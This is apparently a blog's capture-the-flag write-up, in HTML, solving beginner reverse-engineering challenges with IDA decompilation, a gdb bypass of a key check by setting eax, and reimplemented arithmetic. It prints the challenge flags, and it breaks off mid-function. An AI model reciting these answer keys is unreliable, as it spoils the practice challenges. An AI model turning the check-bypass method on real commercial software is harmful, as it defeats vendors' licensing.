href="#secret-galaxy-300" class="headerlink" title="secret-galaxy-300"></a>secret-galaxy-300</h3><p>Run the program</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/6kehj9AW4gcxnsz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Look at the strings in IDA</p><figure class="image-bubble"> <div 
class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/PdQ6TEwJvq9mY2j.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Debug it dynamically and inspect memory after the program has run.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/sRWm3roqci15tTd.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The string <strong><em>aliens_are_around_us</em></strong> shows up in memory; submitting it is accepted.</p><h3 id="srm-50"><a href="#srm-50" class="headerlink" title="srm-50"></a>srm-50</h3><p>A Windows exe</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/tgYfT96MbWqmNeU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Running it shows an MFC dialog-based program; entering arbitrary data gives a registration failure. For static analysis in IDA, locate WinMain, the entry point of an MFC application.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/bBMgTV1kHYtKeI4.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Reading the code, it first validates the e-mail address and then checks v11. IDA declares v11 as a 4-byte array, CHAR v11[4], but the checks continue into v12 through v23, the adjacent stack bytes that a longer input runs into; together that is exactly 16 bytes, so the flag length is 16.</p><p>Write a program to compute it</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/u5Te8KsNH2hqIVi.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>This gives the flag</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/MHe5WSqo1z9rO4k.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="simple-check-100"><a href="#simple-check-100" class="headerlink" title="simple-check-100"></a>simple-check-100</h3><p>This one is worth writing up because it was my first contact with peda.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td 
class="code"><pre><span class="line"> <span class="number">1</span> int __cdecl main(int argc, const char **argv, const char **envp)</span><br><span class="line"> <span class="number">2</span> {</span><br><span class="line"> <span class="number">3</span> void *v3; // esp</span><br><span class="line"> <span class="number">4</span> void *v4; // esp</span><br><span class="line"> <span class="number">5</span> char *v6; // [esp+<span class="number">4</span>h] [ebp<span class="number">-44</span>h]</span><br><span class="line"> <span class="number">6</span> char v7; // [esp+<span class="number">8</span>h] [ebp<span class="number">-40</span>h]</span><br><span class="line"> <span class="number">7</span> char v8; // [esp+<span class="number">1</span>Bh] [ebp<span class="number">-2</span>Dh]</span><br><span class="line"> <span class="number">8</span> char *v9; // [esp+<span class="number">1</span>Ch] [ebp<span class="number">-2</span>Ch]</span><br><span class="line"> <span class="number">9</span> int v10; // [esp+<span class="number">20</span>h] [ebp<span class="number">-28</span>h]</span><br><span class="line"><span class="number">10</span> char v11; // [esp+<span class="number">25</span>h] [ebp<span class="number">-23</span>h]</span><br><span class="line"><span class="number">11</span> char v12; // [esp+<span class="number">26</span>h] [ebp<span class="number">-22</span>h]</span><br><span class="line"><span class="number">12</span> char v13; // [esp+<span class="number">27</span>h] [ebp<span class="number">-21</span>h]</span><br><span class="line"><span class="number">13</span> char v14; // [esp+<span class="number">28</span>h] [ebp<span class="number">-20</span>h]</span><br><span class="line"><span class="number">14</span> char v15; // [esp+<span class="number">29</span>h] [ebp<span class="number">-1</span>Fh]</span><br><span class="line"><span class="number">15</span> char v16; // [esp+<span class="number">2</span>Ah] [ebp<span class="number">-1</span>Eh]</span><br><span 
class="line"><span class="number">16</span> char v17; // [esp+<span class="number">2</span>Bh] [ebp<span class="number">-1</span>Dh]</span><br><span class="line"><span class="number">17</span> char v18; // [esp+<span class="number">2</span>Ch] [ebp<span class="number">-1</span>Ch]</span><br><span class="line"><span class="number">18</span> char v19; // [esp+<span class="number">2</span>Dh] [ebp<span class="number">-1</span>Bh]</span><br><span class="line"><span class="number">19</span> char v20; // [esp+<span class="number">2</span>Eh] [ebp<span class="number">-1</span>Ah]</span><br><span class="line"><span class="number">20</span> char v21; // [esp+<span class="number">2</span>Fh] [ebp<span class="number">-19</span>h]</span><br><span class="line"><span class="number">21</span> char v22; // [esp+<span class="number">30</span>h] [ebp<span class="number">-18</span>h]</span><br><span class="line"><span class="number">22</span> char v23; // [esp+<span class="number">31</span>h] [ebp<span class="number">-17</span>h]</span><br><span class="line"><span class="number">23</span> char v24; // [esp+<span class="number">32</span>h] [ebp<span class="number">-16</span>h]</span><br><span class="line"><span class="number">24</span> char v25; // [esp+<span class="number">33</span>h] [ebp<span class="number">-15</span>h]</span><br><span class="line"><span class="number">25</span> char v26; // [esp+<span class="number">34</span>h] [ebp<span class="number">-14</span>h]</span><br><span class="line"><span class="number">26</span> char v27; // [esp+<span class="number">35</span>h] [ebp<span class="number">-13</span>h]</span><br><span class="line"><span class="number">27</span> char v28; // [esp+<span class="number">36</span>h] [ebp<span class="number">-12</span>h]</span><br><span class="line"><span class="number">28</span> char v29; // [esp+<span class="number">37</span>h] [ebp<span class="number">-11</span>h]</span><br><span class="line"><span class="number">29</span> char v30; // 
[esp+<span class="number">38</span>h] [ebp<span class="number">-10</span>h]</span><br><span class="line"><span class="number">30</span> char v31; // [esp+<span class="number">39</span>h] [ebp-Fh]</span><br><span class="line"><span class="number">31</span> char v32; // [esp+<span class="number">3</span>Ah] [ebp-Eh]</span><br><span class="line"><span class="number">32</span> char v33; // [esp+<span class="number">3</span>Bh] [ebp-Dh]</span><br><span class="line"><span class="number">33</span> char v34; // [esp+<span class="number">3</span>Ch] [ebp-Ch]</span><br><span class="line"><span class="number">34</span> char v35; // [esp+<span class="number">3</span>Dh] [ebp-Bh]</span><br><span class="line"><span class="number">35</span> char v36; // [esp+<span class="number">3</span>Eh] [ebp-Ah]</span><br><span class="line"><span class="number">36</span> char v37; // [esp+<span class="number">3</span>Fh] [ebp<span class="number">-9</span>h]</span><br><span class="line"><span class="number">37</span> int *v38; // [esp+<span class="number">40</span>h] [ebp<span class="number">-8</span>h]</span><br><span class="line"><span class="number">38</span> </span><br><span class="line"><span class="number">39</span> v38 = &argc;</span><br><span class="line"><span class="number">40</span> __main();</span><br><span class="line"><span class="number">41</span> v8 = <span class="string">'T'</span>;</span><br><span class="line"><span class="number">42</span> v37 = <span class="number">-56</span>;</span><br><span class="line"><span class="number">43</span> v36 = <span class="number">126</span>;</span><br><span class="line"><span class="number">44</span> v35 = <span class="number">-29</span>;</span><br><span class="line"><span class="number">45</span> v34 = <span class="number">100</span>;</span><br><span class="line"><span class="number">46</span> v33 = <span class="number">-57</span>;</span><br><span class="line"><span class="number">47</span> v32 = <span 
class="number">22</span>;</span><br><span class="line"><span class="number">48</span> v31 = <span class="number">-102</span>;</span><br><span class="line"><span class="number">49</span> v30 = <span class="number">-51</span>;</span><br><span class="line"><span class="number">50</span> v29 = <span class="number">17</span>;</span><br><span class="line"><span class="number">51</span> v28 = <span class="number">101</span>;</span><br><span class="line"><span class="number">52</span> v27 = <span class="number">50</span>;</span><br><span class="line"><span class="number">53</span> v26 = <span class="number">45</span>;</span><br><span class="line"><span class="number">54</span> v25 = <span class="number">-29</span>;</span><br><span class="line"><span class="number">55</span> v24 = <span class="number">-45</span>;</span><br><span class="line"><span class="number">56</span> v23 = <span class="number">67</span>;</span><br><span class="line"><span class="number">57</span> v22 = <span class="number">-110</span>;</span><br><span class="line"><span class="number">58</span> v21 = <span class="number">-87</span>;</span><br><span class="line"><span class="number">59</span> v20 = <span class="number">-99</span>;</span><br><span class="line"><span class="number">60</span> v19 = <span class="number">-46</span>;</span><br><span class="line"><span class="number">61</span> v18 = <span class="number">-26</span>;</span><br><span class="line"><span class="number">62</span> v17 = <span class="number">109</span>;</span><br><span class="line"><span class="number">63</span> v16 = <span class="number">44</span>;</span><br><span class="line"><span class="number">64</span> v15 = <span class="number">-45</span>;</span><br><span class="line"><span class="number">65</span> v14 = <span class="number">-74</span>;</span><br><span class="line"><span class="number">66</span> v13 = <span class="number">-67</span>;</span><br><span class="line"><span class="number">67</span> v12 = <span 
class="number">-2</span>;</span><br><span class="line"><span class="number">68</span> v11 = <span class="number">106</span>;</span><br><span class="line"><span class="number">69</span> v10 = <span class="number">19</span>;</span><br><span class="line"><span class="number">70</span> v3 = alloca(<span class="number">32</span>);</span><br><span class="line"><span class="number">71</span> v4 = alloca(<span class="number">32</span>);</span><br><span class="line"><span class="number">72</span> v9 = &v7;</span><br><span class="line"><span class="number">73</span> printf(<span class="string">"Key: "</span>);</span><br><span class="line"><span class="number">74</span> v6 = v9;</span><br><span class="line"><span class="number">75</span> scanf(<span class="string">"%s"</span>, v9);</span><br><span class="line"><span class="number">76</span> <span class="keyword">if</span> ( check_key((int)v9) )</span><br><span class="line"><span class="number">77</span> interesting_function((int)&v8);</span><br><span class="line"><span class="number">78</span> <span class="keyword">else</span></span><br><span class="line"><span class="number">79</span> puts(<span class="string">"Wrong"</span>);</span><br><span class="line"><span class="number">80</span> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"><span class="number">81</span> }</span><br></pre></td></tr></table></figure></div><p>Clearly, if we bypass the check on line 76 we get the flag: interesting_function receives only &v8, and the data starting at v8 is already filled in by the constants above, so the key itself is never needed.</p><p>Take the Linux build of the binary into a Linux box for debugging.</p><blockquote><p>task9_x86_64_46d01fe312d35ecf69c4ff8ab8ace75d080891dc</p></blockquote><p>Commands</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">gdb</span><br><span class="line"></span><br><span class="line">file task9_x86_64_46d01fe312d35ecf69c4ff8ab8ace75d080891dc</span><br><span class="line"></span><br><span 
class="line">b main</span><br><span class="line"></span><br><span class="line">r</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/cQLeR9KnP8lzCkT.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Then keep stepping with next until execution reaches the call to check_key.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/7XPICob8ZVvTAqM.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>After the call returns, the result is checked with test eax,eax. To make that test see a non-zero value and take the branch into interesting_function, set eax to 1 before the test executes, then continue.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/7rDfO62TvRQ3NiX.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Change eax</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">set $eax=1</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/o9KtDjrs7e6lZ5L.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="Mysterious"><a href="#Mysterious" class="headerlink" title="Mysterious"></a>Mysterious</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">int __stdcall sub_401090(HWND hWnd, int a2, int a3, int a4)</span><br><span class="line">{</span><br><span class="line"> char v5; // [esp+<span class="number">50</span>h] [ebp<span class="number">-310</span>h]</span><br><span class="line"> CHAR Text[<span class="number">4</span>]; // [esp+<span 
class="number">154</span>h] [ebp<span class="number">-20</span>Ch]</span><br><span class="line"> char v7; // [esp+<span class="number">159</span>h] [ebp<span class="number">-207</span>h]</span><br><span class="line"> __int16 v8; // [esp+<span class="number">255</span>h] [ebp<span class="number">-10</span>Bh]</span><br><span class="line"> char v9; // [esp+<span class="number">257</span>h] [ebp<span class="number">-109</span>h]</span><br><span class="line"> int v10_108; // [esp+<span class="number">258</span>h] [ebp<span class="number">-108</span>h]</span><br><span class="line"> CHAR myinput; // [esp+<span class="number">25</span>Ch] [ebp<span class="number">-104</span>h]</span><br><span class="line"> char v11_101; // [esp+<span class="number">25</span>Fh] [ebp<span class="number">-101</span>h]</span><br><span class="line"> char v12_100; // [esp+<span class="number">260</span>h] [ebp<span class="number">-100</span>h]</span><br><span class="line"> char v13_FF; // [esp+<span class="number">261</span>h] [ebp-FFh]</span><br><span class="line"></span><br><span class="line"> memset(&myinput, <span class="number">0</span>, <span class="number">0x104</span>u);</span><br><span class="line"> v10_108 = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">if</span> ( a2 == <span class="number">16</span> )</span><br><span class="line"> {</span><br><span class="line"> DestroyWindow(hWnd);</span><br><span class="line"> PostQuitMessage(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> ( a2 == <span class="number">273</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( a3 == <span class="number">1000</span> )</span><br><span class="line"> {</span><br><span class="line"> GetDlgItemTextA(hWnd, <span class="number">1002</span>, &myinput, <span class="number">260</span>);</span><br><span 
class="line"> strlen(&myinput);</span><br><span class="line"> <span class="keyword">if</span> ( strlen(&myinput) > <span class="number">6</span> ) // input must be at most <span class="number">6</span> characters</span><br><span class="line"> ExitProcess(<span class="number">0</span>);</span><br><span class="line"> v10_108 = atoi(&myinput) + <span class="number">1</span>; // atoi() converts the leading digits of the string to an int and stops at the first character outside '<span class="number">0</span>'..'<span class="number">9</span>'</span><br><span class="line"> // v10 = that number + <span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> ( v10_108 == <span class="number">123</span> && v11_101 == <span class="string">'x'</span> && v13_FF == <span class="string">'z'</span> && v12_100 == <span class="string">'y'</span> )// atoi result + <span class="number">1</span> must equal <span class="number">123</span>, so the leading digits are <span class="number">122</span></span><br><span class="line"> // and bytes <span class="number">3</span>..<span class="number">5</span> of the input (its last three characters) must be xyz, i.e. the input is 122xyz</span><br><span class="line"> {</span><br><span class="line"> strcpy(Text, <span class="string">"flag"</span>); // the flag is assembled below</span><br><span class="line"> memset(&v7, <span class="number">0</span>, <span class="number">0xFC</span>u);</span><br><span class="line"> v8 = <span class="number">0</span>;</span><br><span class="line"> v9 = <span class="number">0</span>;</span><br><span class="line"> _itoa(v10_108, &v5, <span class="number">10</span>);</span><br><span class="line"> strcat(Text, <span class="string">"{"</span>);</span><br><span class="line"> strcat(Text, &v5);</span><br><span class="line"> strcat(Text, <span class="string">"_"</span>);</span><br><span class="line"> strcat(Text, <span class="string">"Buff3r_0v3rf|0w"</span>);</span><br><span class="line"> strcat(Text, <span class="string">"}"</span>);</span><br><span class="line"> MessageBoxA(<span class="number">0</span>, Text, <span class="string">"well done"</span>, <span class="number">0</span>);</span><br><span class="line"> 
}</span><br><span class="line"> SetTimer(hWnd, <span class="number">1</span>u, <span class="number">0x3E8</span>u, TimerFunc);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( a3 == <span class="number">1001</span> )</span><br><span class="line"> KillTimer(hWnd, <span class="number">1</span>u);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/r4SjUdbCuf3lNYL.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/b4DwoQcrNOszVFj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p> <strong><em>flag{123_Buff3r_0v3rf|0w}</em></strong></p><h3 id="Newbie-calculations"><a href="#Newbie-calculations" class="headerlink" title="Newbie_calculations"></a>Newbie_calculations</h3><p>Baidu Translate renders the challenge name as "beginner calculations", so I guess this is a challenge about implementing a calculator...</p><p>Opening the program in IDA shows a long chain of repeated calls to the same few functions, and the program takes no input, only produces output. So running it should simply print the flag, but the program certainly contains junk loops that keep it from ever finishing.</p><p>For this kind of challenge you analyze what each function does, simplify it, and reimplement the algorithm yourself.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; i < <span class="number">32</span>; ++i )</span><br><span class="line"> flag[i] = <span class="number">1</span>;</span><br><span class="line"> v121 = <span class="number">0</span>;</span><br><span class="line"> puts(<span class="string">"Your flag is:"</span>);</span><br><span class="line"> v3 = mul_401100(flag, <span 
class="number">0x3B9ACA00</span>);</span><br><span class="line"> v4 = sub_401220(v3, <span class="number">0x3B9AC9CE</span>);</span><br><span class="line"> mul_401100(v4, <span class="number">2</span>);</span><br><span class="line"> v5 = add_401000(&flag[<span class="number">1</span>], <span class="number">0x4C4B40</span>);</span><br><span class="line"> v6 = sub_401220(v5, <span class="number">0x65B9AA</span>);</span><br><span class="line"> v7 = add_401000(v6, <span class="number">1666666</span>);</span><br><span class="line"> v8 = add_401000(v7, <span class="number">45</span>);</span><br><span class="line"> v9 = mul_401100(v8, <span class="number">2</span>);</span><br><span class="line"> add_401000(v9, <span class="number">5</span>);</span><br><span class="line"> v10 = mul_401100(&flag[<span class="number">2</span>], <span class="number">0x3B9ACA00</span>);</span><br><span class="line"> v11 = sub_401220(v10, <span class="number">999999950</span>);</span><br><span class="line"> v12 = mul_401100(v11, <span class="number">2</span>);</span><br><span class="line"> add_401000(v12, <span class="number">2</span>);</span><br><span class="line"> v13 = add_401000(&flag[<span class="number">3</span>], <span class="number">55</span>);</span><br><span class="line"> v14 = sub_401220(v13, <span class="number">3</span>);</span><br><span class="line"> v15 = add_401000(v14, <span class="number">4</span>);</span><br><span class="line"> sub_401220(v15, <span class="number">1</span>);</span><br><span class="line"> v16 = mul_401100(&flag[<span class="number">4</span>], <span class="number">100000000</span>);</span><br><span class="line"> v17 = sub_401220(v16, <span class="number">99999950</span>);</span><br><span class="line"> v18 = mul_401100(v17, <span class="number">2</span>);</span><br><span class="line"> add_401000(v18, <span class="number">2</span>);</span><br><span class="line"> v19 = sub_401220(&flag[<span class="number">5</span>], <span class="number">1</span>);</span><br><span 
class="line"> v20 = mul_401100(v19, <span class="number">1000000000</span>);</span><br><span class="line"> v21 = add_401000(v20, <span class="number">55</span>);</span><br><span class="line"> sub_401220(v21, <span class="number">3</span>);</span><br><span class="line"> v22 = mul_401100(&flag[<span class="number">6</span>], <span class="number">1000000</span>);</span><br><span class="line"> v23 = sub_401220(v22, <span class="number">999975</span>);</span><br><span class="line"> mul_401100(v23, <span class="number">4</span>);</span><br><span class="line"> v24 = add_401000(&flag[<span class="number">7</span>], <span class="number">55</span>);</span><br><span class="line"> v25 = sub_401220(v24, <span class="number">33</span>);</span><br><span class="line"> v26 = add_401000(v25, <span class="number">44</span>);</span><br><span class="line"> sub_401220(v26, <span class="number">11</span>);</span><br><span class="line"> v27 = mul_401100(&flag[<span class="number">8</span>], <span class="number">10</span>);</span><br><span class="line"> v28 = sub_401220(v27, <span class="number">5</span>);</span><br><span class="line"> v29 = mul_401100(v28, <span class="number">8</span>);</span><br><span class="line"> add_401000(v29, <span class="number">9</span>);</span><br><span class="line"> v30 = add_401000(&flag[<span class="number">9</span>], <span class="number">0</span>);</span><br><span class="line"> v31 = sub_401220(v30, <span class="number">0</span>);</span><br><span class="line"> v32 = add_401000(v31, <span class="number">11</span>);</span><br><span class="line"> v33 = sub_401220(v32, <span class="number">11</span>);</span><br><span class="line"> add_401000(v33, <span class="number">53</span>);</span><br><span class="line"> v34 = add_401000(&flag[<span class="number">10</span>], <span class="number">49</span>);</span><br><span class="line"> v35 = sub_401220(v34, <span class="number">2</span>);</span><br><span class="line"> v36 = add_401000(v35, <span 
class="number">4</span>);</span><br><span class="line"> sub_401220(v36, <span class="number">2</span>);</span><br><span class="line"> v37 = mul_401100(&flag[<span class="number">11</span>], <span class="number">1000000</span>);</span><br><span class="line"> v38 = sub_401220(v37, <span class="number">999999</span>);</span><br><span class="line"> v39 = mul_401100(v38, <span class="number">4</span>);</span><br><span class="line"> add_401000(v39, <span class="number">50</span>);</span><br><span class="line"> v40 = add_401000(&flag[<span class="number">12</span>], <span class="number">1</span>);</span><br><span class="line"> v41 = add_401000(v40, <span class="number">1</span>);</span><br><span class="line"> v42 = add_401000(v41, <span class="number">1</span>);</span><br><span class="line"> v43 = add_401000(v42, <span class="number">1</span>);</span><br><span class="line"> v44 = add_401000(v43, <span class="number">1</span>);</span><br><span class="line"> v45 = add_401000(v44, <span class="number">1</span>);</span><br><span class="line"> v46 = add_401000(v45, <span class="number">10</span>);</span><br><span class="line"> add_401000(v46, <span class="number">32</span>);</span><br><span class="line"> v47 = mul_401100(&flag[<span class="number">13</span>], <span class="number">10</span>);</span><br><span class="line"> v48 = sub_401220(v47, <span class="number">5</span>);</span><br><span class="line"> v49 = mul_401100(v48, <span class="number">8</span>);</span><br><span class="line"> v50 = add_401000(v49, <span class="number">9</span>);</span><br><span class="line"> add_401000(v50, <span class="number">48</span>);</span><br><span class="line"> v51 = sub_401220(&flag[<span class="number">14</span>], <span class="number">1</span>);</span><br><span class="line"> v52 = mul_401100(v51, <span class="number">-294967296</span>);</span><br><span class="line"> v53 = add_401000(v52, <span class="number">55</span>);</span><br><span class="line"> sub_401220(v53, <span 
class="number">3</span>);</span><br><span class="line"> v54 = add_401000(&flag[<span class="number">15</span>], <span class="number">1</span>);</span><br><span class="line"> v55 = add_401000(v54, <span class="number">2</span>);</span><br><span class="line"> v56 = add_401000(v55, <span class="number">3</span>);</span><br><span class="line"> v57 = add_401000(v56, <span class="number">4</span>);</span><br><span class="line"> v58 = add_401000(v57, <span class="number">5</span>);</span><br><span class="line"> v59 = add_401000(v58, <span class="number">6</span>);</span><br><span class="line"> v60 = add_401000(v59, <span class="number">7</span>);</span><br><span class="line"> add_401000(v60, <span class="number">20</span>);</span><br><span class="line"> v61 = mul_401100(&flag[<span class="number">16</span>], <span class="number">10</span>);</span><br><span class="line"> v62 = sub_401220(v61, <span class="number">5</span>);</span><br><span class="line"> v63 = mul_401100(v62, <span class="number">8</span>);</span><br><span class="line"> v64 = add_401000(v63, <span class="number">9</span>);</span><br><span class="line"> add_401000(v64, <span class="number">48</span>);</span><br><span class="line"> v65 = add_401000(&flag[<span class="number">17</span>], <span class="number">7</span>);</span><br><span class="line"> v66 = add_401000(v65, <span class="number">6</span>);</span><br><span class="line"> v67 = add_401000(v66, <span class="number">5</span>);</span><br><span class="line"> v68 = add_401000(v67, <span class="number">4</span>);</span><br><span class="line"> v69 = add_401000(v68, <span class="number">3</span>);</span><br><span class="line"> v70 = add_401000(v69, <span class="number">2</span>);</span><br><span class="line"> v71 = add_401000(v70, <span class="number">1</span>);</span><br><span class="line"> add_401000(v71, <span class="number">20</span>);</span><br><span class="line"> v72 = add_401000(&flag[<span class="number">18</span>], <span 
class="number">7</span>);</span><br><span class="line"> v73 = add_401000(v72, <span class="number">2</span>);</span><br><span class="line"> v74 = add_401000(v73, <span class="number">4</span>);</span><br><span class="line"> v75 = add_401000(v74, <span class="number">3</span>);</span><br><span class="line"> v76 = add_401000(v75, <span class="number">6</span>);</span><br><span class="line"> v77 = add_401000(v76, <span class="number">5</span>);</span><br><span class="line"> v78 = add_401000(v77, <span class="number">1</span>);</span><br><span class="line"> add_401000(v78, <span class="number">20</span>);</span><br><span class="line"> v79 = mul_401100(&flag[<span class="number">19</span>], <span class="number">1000000</span>);</span><br><span class="line"> v80 = sub_401220(v79, <span class="number">999999</span>);</span><br><span class="line"> v81 = mul_401100(v80, <span class="number">4</span>);</span><br><span class="line"> v82 = add_401000(v81, <span class="number">50</span>);</span><br><span class="line"> sub_401220(v82, <span class="number">1</span>);</span><br><span class="line"> v83 = sub_401220(&flag[<span class="number">20</span>], <span class="number">1</span>);</span><br><span class="line"> v84 = mul_401100(v83, <span class="number">-294967296</span>);</span><br><span class="line"> v85 = add_401000(v84, <span class="number">49</span>);</span><br><span class="line"> sub_401220(v85, <span class="number">1</span>);</span><br><span class="line"> v86 = sub_401220(&flag[<span class="number">21</span>], <span class="number">1</span>);</span><br><span class="line"> v87 = mul_401100(v86, <span class="number">1000000000</span>);</span><br><span class="line"> v88 = add_401000(v87, <span class="number">54</span>);</span><br><span class="line"> v89 = sub_401220(v88, <span class="number">1</span>);</span><br><span class="line"> v90 = add_401000(v89, <span class="number">1000000000</span>);</span><br><span class="line"> sub_401220(v90, <span 
class="number">1000000000</span>);</span><br><span class="line"> v91 = add_401000(&flag[<span class="number">22</span>], <span class="number">49</span>);</span><br><span class="line"> v92 = sub_401220(v91, <span class="number">1</span>);</span><br><span class="line"> v93 = add_401000(v92, <span class="number">2</span>);</span><br><span class="line"> sub_401220(v93, <span class="number">1</span>);</span><br><span class="line"> v94 = mul_401100(&flag[<span class="number">23</span>], <span class="number">10</span>);</span><br><span class="line"> v95 = sub_401220(v94, <span class="number">5</span>);</span><br><span class="line"> v96 = mul_401100(v95, <span class="number">8</span>);</span><br><span class="line"> v97 = add_401000(v96, <span class="number">9</span>);</span><br><span class="line"> add_401000(v97, <span class="number">48</span>);</span><br><span class="line"> v98 = add_401000(&flag[<span class="number">24</span>], <span class="number">1</span>);</span><br><span class="line"> v99 = add_401000(v98, <span class="number">3</span>);</span><br><span class="line"> v100 = add_401000(v99, <span class="number">3</span>);</span><br><span class="line"> v101 = add_401000(v100, <span class="number">3</span>);</span><br><span class="line"> v102 = add_401000(v101, <span class="number">6</span>);</span><br><span class="line"> v103 = add_401000(v102, <span class="number">6</span>);</span><br><span class="line"> v104 = add_401000(v103, <span class="number">6</span>);</span><br><span class="line"> add_401000(v104, <span class="number">20</span>);</span><br><span class="line"> v105 = add_401000(&flag[<span class="number">25</span>], <span class="number">55</span>);</span><br><span class="line"> v106 = sub_401220(v105, <span class="number">33</span>);</span><br><span class="line"> v107 = add_401000(v106, <span class="number">44</span>);</span><br><span class="line"> v108 = sub_401220(v107, <span class="number">11</span>);</span><br><span class="line"> add_401000(v108, <span 
class="number">42</span>);</span><br><span class="line"> add_401000(&flag[<span class="number">26</span>], flag[<span class="number">25</span>]);</span><br><span class="line"> add_401000(&flag[<span class="number">27</span>], flag[<span class="number">12</span>]);</span><br><span class="line"> v109 = flag[<span class="number">27</span>];</span><br><span class="line"> v110 = sub_401220(&flag[<span class="number">28</span>], <span class="number">1</span>);</span><br><span class="line"> v111 = add_401000(v110, v109);</span><br><span class="line"> sub_401220(v111, <span class="number">1</span>);</span><br><span class="line"> v112 = flag[<span class="number">23</span>];</span><br><span class="line"> v113 = sub_401220(&flag[<span class="number">29</span>], <span class="number">1</span>);</span><br><span class="line"> v114 = mul_401100(v113, <span class="number">1000000</span>);</span><br><span class="line"> add_401000(v114, v112);</span><br><span class="line"> v115 = flag[<span class="number">27</span>];</span><br><span class="line"> v116 = add_401000(&flag[<span class="number">30</span>], <span class="number">1</span>);</span><br><span class="line"> mul_401100(v116, v115);</span><br><span class="line"> add_401000(&flag[<span class="number">31</span>], flag[<span class="number">30</span>]);</span><br><span class="line"> print_401C7F(<span class="string">"CTF{"</span>);</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j < <span class="number">32</span>; ++j )</span><br><span class="line"> print_401C7F(<span class="string">"%c"</span>, SLOBYTE(flag[j]));</span><br><span class="line"> print_401C7F(<span class="string">"}\n"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>The key to this challenge is recognizing what the functions above actually do.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" 
spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">_DWORD *__cdecl mul_401100(_DWORD *a1, int a2)</span><br><span class="line">{</span><br><span class="line"> int v2; // ST20_4</span><br><span class="line"> signed int v4; // [esp+Ch] [ebp<span class="number">-1</span>Ch]</span><br><span class="line"> int v5; // [esp+<span class="number">14</span>h] [ebp<span class="number">-14</span>h]</span><br><span class="line"> int v6; // [esp+<span class="number">18</span>h] [ebp<span class="number">-10</span>h]</span><br><span class="line"> int v7; // [esp+<span class="number">1</span>Ch] [ebp-Ch]</span><br><span class="line"> int v8; // [esp+<span class="number">20</span>h] [ebp<span class="number">-8</span>h]</span><br><span class="line"></span><br><span class="line"> v5 = *a1;</span><br><span class="line"> v6 = a2;</span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> v8 = <span class="number">0</span>;</span><br><span class="line"> v7 = a2 * v5;</span><br><span class="line"> <span class="keyword">while</span> ( a2 ) // accumulates *a1 a2 times, equivalent to a1*a2</span><br><span class="line"> {</span><br><span class="line"> v2 = v7 * v5;</span><br><span class="line"> add_401000(&v8, *a1);</span><br><span class="line"> ++v7;</span><br><span class="line"> --a2;</span><br><span class="line"> v6 = v2 - <span class="number">1</span>;</span><br><span 